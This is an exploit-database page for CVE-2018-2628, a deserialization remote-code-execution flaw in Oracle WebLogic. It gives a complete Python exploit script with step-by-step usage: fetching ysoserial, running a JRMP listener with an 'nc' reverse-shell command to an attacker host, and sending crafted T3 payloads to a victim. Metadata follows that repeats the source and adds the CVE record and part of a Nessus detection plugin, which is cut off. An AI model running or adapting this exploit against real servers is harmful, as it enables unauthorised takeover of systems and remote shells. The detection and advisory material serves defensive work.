Search...

Oracle Weblogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 Deserialization Remote Command Execution

2018-04-29T00:00:00

ID 1337DAY-ID-30270
Type zdt
Reporter brianwrf
Modified 2018-04-29T00:00:00

Description

Exploit for multiple platform in category remote exploits

                                        
                                            # -*- coding: utf-8 -*-
# Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization Remote Command Execution Vulnerability (CVE-2018-2628)
#
# IMPORTANT: Is provided only for educational or information purposes.
#
# Credit: Thanks by Liao Xinxi of NSFOCUS Security Team
# Reference: http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
#
# How to exploit:
# 1. run below command on JRMPListener host
#    1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
#    2) java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
#       e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'
# 2. start a listener on attacker host
#    e.g. nc -nlvp 4040
# 3. run this script on attacker host
#    1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
#    2) python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
#       e.g.
#           a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)
#           b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)
 
from __future__ import print_function
 
import binascii
import os
import socket
import sys
import time
 
 
def generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
    #generates ysoserial payload
    command = 'java -jar {} {} {}:{} &gt; payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port)
    print("command: " + command)
    os.system(command)
    bin_file = open('payload.out','rb').read()
    return binascii.hexlify(bin_file)
 
 
def t3_handshake(sock, server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    print('handshake successful')
 
 
def build_t3_request_object(sock, port):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))
 
 
def send_payload_objdata(sock, data):
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception:
        pass
    return res
 
 
def exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(65)
    server_addr = (dip, dport)
    t3_handshake(sock, server_addr)
    build_t3_request_object(sock, dport)
    payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)
    print("payload: " + payload)
    rs=send_payload_objdata(sock, payload)
    print('response: ' + rs)
    print('exploit completed!')
 
 
if __name__=="__main__":
    #check for args, print usage if incorrect
    if len(sys.argv) != 7:
        print('\nUsage:\nexploit.py [victim ip] [victim port] [path to ysoserial] '
              '[JRMPListener ip] [JRMPListener port] [JRMPClient]\n')
        sys.exit()
 
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    path_ysoserial = sys.argv[3]
    jrmp_listener_ip = sys.argv[4]
    jrmp_listener_port = sys.argv[5]
    jrmp_client = sys.argv[6]
    exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)

#  0day.today [2018-04-30]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-30270", "bulletinFamily": "exploit", "title": "Oracle Weblogic Server 10.3.6.0/12.1.3.0/12.2.1.2/12.2.1.3 Deserialization Remote Command Execution", "description": "Exploit for multiple platform in category remote exploits", "published": "2018-04-29T00:00:00", "modified": "2018-04-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://0day.today/exploit/description/30270", "reporter": "brianwrf", "references": [], "cvelist": ["CVE-2018-2628"], "type": "zdt", "lastseen": "2018-04-30T02:13:49", "edition": 1, "viewCount": 77, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2018-04-30T02:13:49", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-2628"]}, {"type": "nessus", "idList": ["WEBLOGIC_CVE_2018_2628.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2018.NASL"]}, {"type": "seebug", "idList": ["SSV:97236"]}, {"type": "myhack58", "idList": ["MYHACK58:62201890003"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152014", "PACKETSTORM:148878"]}, {"type": "thn", "idList": ["THN:B899834FCFF1D593C20E11F19F0E6769"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE", "MSF:EXPLOIT/WINDOWS/MISC/WEBLOGIC_DESERIALIZE"]}, {"type": "exploitdb", "idList": ["EDB-ID:45193", "EDB-ID:46513", "EDB-ID:44553"]}, {"type": "zdt", "idList": ["1337DAY-ID-30868", "1337DAY-ID-32327"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4E686858C529C5DA732FBC1E25A496DB"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2018-3678067"]}], "modified": "2018-04-30T02:13:49", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://0day.today/exploit/30270", "sourceData": "# -*- coding: utf-8 -*-\r\n# Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization Remote Command Execution Vulnerability (CVE-2018-2628)\r\n#\r\n# IMPORTANT: Is provided only for educational or information purposes.\r\n#\r\n# Credit: Thanks by Liao Xinxi of NSFOCUS Security Team\r\n# Reference: http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA\r\n#\r\n# How to exploit:\r\n# 1. run below command on JRMPListener host\r\n# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar\r\n# 2) java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]\r\n# e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'\r\n# 2. start a listener on attacker host\r\n# e.g. nc -nlvp 4040\r\n# 3. run this script on attacker host\r\n# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar\r\n# 2) python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]\r\n# e.g.\r\n# a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)\r\n# b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)\r\n \r\nfrom __future__ import print_function\r\n \r\nimport binascii\r\nimport os\r\nimport socket\r\nimport sys\r\nimport time\r\n \r\n \r\ndef generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):\r\n #generates ysoserial payload\r\n command = 'java -jar {} {} {}:{} > payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port)\r\n print(\"command: \" + command)\r\n os.system(command)\r\n bin_file = open('payload.out','rb').read()\r\n return binascii.hexlify(bin_file)\r\n \r\n \r\ndef t3_handshake(sock, server_addr):\r\n sock.connect(server_addr)\r\n sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))\r\n time.sleep(1)\r\n sock.recv(1024)\r\n print('handshake successful')\r\n \r\n \r\ndef build_t3_request_object(sock, port):\r\n data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'\r\n data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))\r\n data3 = '1a7727000d3234322e323134'\r\n data4 = '2e312e32353461863d1d0000000078'\r\n for d in [data1,data2,data3,data4]:\r\n sock.send(d.decode('hex'))\r\n time.sleep(2)\r\n print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))\r\n \r\n \r\ndef send_payload_objdata(sock, data):\r\n payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'\r\n payload+=data\r\n payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'\r\n payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)\r\n sock.send(payload.decode('hex'))\r\n time.sleep(2)\r\n sock.send(payload.decode('hex'))\r\n res = ''\r\n try:\r\n while True:\r\n res += sock.recv(4096)\r\n time.sleep(0.1)\r\n except Exception:\r\n pass\r\n return res\r\n \r\n \r\ndef exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.settimeout(65)\r\n server_addr = (dip, dport)\r\n t3_handshake(sock, server_addr)\r\n build_t3_request_object(sock, dport)\r\n payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)\r\n print(\"payload: \" + payload)\r\n rs=send_payload_objdata(sock, payload)\r\n print('response: ' + rs)\r\n print('exploit completed!')\r\n \r\n \r\nif __name__==\"__main__\":\r\n #check for args, print usage if incorrect\r\n if len(sys.argv) != 7:\r\n print('\\nUsage:\\nexploit.py [victim ip] [victim port] [path to ysoserial] '\r\n '[JRMPListener ip] [JRMPListener port] [JRMPClient]\\n')\r\n sys.exit()\r\n \r\n dip = sys.argv[1]\r\n dport = int(sys.argv[2])\r\n path_ysoserial = sys.argv[3]\r\n jrmp_listener_ip = sys.argv[4]\r\n jrmp_listener_port = sys.argv[5]\r\n jrmp_client = sys.argv[6]\r\n exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)\n\n# 0day.today [2018-04-30] #"}

{"cve": [{"lastseen": "2021-02-02T06:52:36", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-19T02:29:00", "title": "CVE-2018-2628", "type": "cve", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2628"], "modified": "2019-04-29T21:01:00", "cpe": ["cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0", "cpe:/a:oracle:weblogic_server:12.2.1.3"], "id": "CVE-2018-2628", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2628", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-02-01T07:39:34", "description": "The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the Core Components subcomponent due to\nunsafe deserialization of Java objects by the RMI registry. An\nunauthenticated, remote attacker can exploit this, via a crafted Java\nobject, to execute arbitrary Java code in the context of the WebLogic\nserver.\n\nNote that this plugin does not attempt to exploit this RCE directly\nand instead checks for the presence of the patch Oracle supplied\nin the April 2018 critical patch update (CPU).", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-30T00:00:00", "title": "Oracle WebLogic Server Deserialization RCE (CVE-2018-2628)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2628"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server", "cpe:/a:oracle:fusion_middleware"], "id": "WEBLOGIC_CVE_2018_2628.NASL", "href": "https://www.tenable.com/plugins/nessus/109429", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109429);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-2628\");\n script_bugtraq_id(103776);\n\n script_name(english:\"Oracle WebLogic Server Deserialization RCE (CVE-2018-2628)\");\n script_summary(english:\"Sends a Java object to trigger an error message.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the Core Components subcomponent due to\nunsafe deserialization of Java objects by the RMI registry. An\nunauthenticated, remote attacker can exploit this, via a crafted Java\nobject, to execute arbitrary Java code in the context of the WebLogic\nserver.\n\nNote that this plugin does not attempt to exploit this RCE directly\nand instead checks for the presence of the patch Oracle supplied\nin the April 2018 critical patch update (CPU).\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4e39ef65\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/brianwrf/CVE-2018-2628\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/shengqi158/CVE-2018-2628\");\n # https://www.tenable.com/blog/critical-oracle-weblogic-server-flaw-still-not-patched\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9cf2dde7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2018 Oracle\nCritical Patch Update advisory.\n\nNote that the patch for CVE-2018-2628 is reportedly incomplete.\nRefer to Oracle for any additional patch instructions or\nmitigation options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-2628\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\", \"t3_detect.nasl\");\n script_require_ports(\"Services/t3\", 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"t3.inc\");\n\n\nappname = \"Oracle WebLogic Server\";\n\nport = get_service(svc:'t3', default:7001, exit_on_fail:TRUE);\n\n# Try to talk T3 to the server\nsock = open_sock_tcp(port);\nif (!sock) audit(AUDIT_SOCK_FAIL, port);\nversion = t3_connect(sock:sock, port:port);\n\n# Only 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 are affected\n# i.e., 12.2.1.1 is not affected?\nif (version !~ \"^10\\.3\\.6\\.\" &&\n version !~ \"^12\\.1\\.3\\.\" &&\n version !~ \"^12\\.2\\.1\\.2($|[^0-9])\" &&\n version !~ \"^12\\.2\\.1\\.3($|[^0-9])\")\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n}\n\n# Send ident so we can move on to login\nt3_send_ident_request(sock:sock, port:port);\n\n# Send our \"login request\"\nauth_request = '\\x05\\x65\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1b\\x00\\x00\\x00\\x5d\\x01\\x01\\x00\\x73\\x72\\x01\\x78\\x70\\x73\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x75\\x72\\x03\\x78\\x70\\x00\\x00\\x00\\x00\\x78\\x74\\x00\\x08\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x75\\x72\\x04\\x78\\x70\\x00\\x00\\x00\\x0c\\x9c\\x97\\x9a\\x9a\\x8c\\x9a\\x9b\\xcf\\xcf\\x9b\\x93\\x9a\\x74\\x00\\x08\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x02\\x5b\\x42\\xac\\xf3\\x17\\xf8\\x06\\x08\\x54\\xe0\\x02\\x00\\x00\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4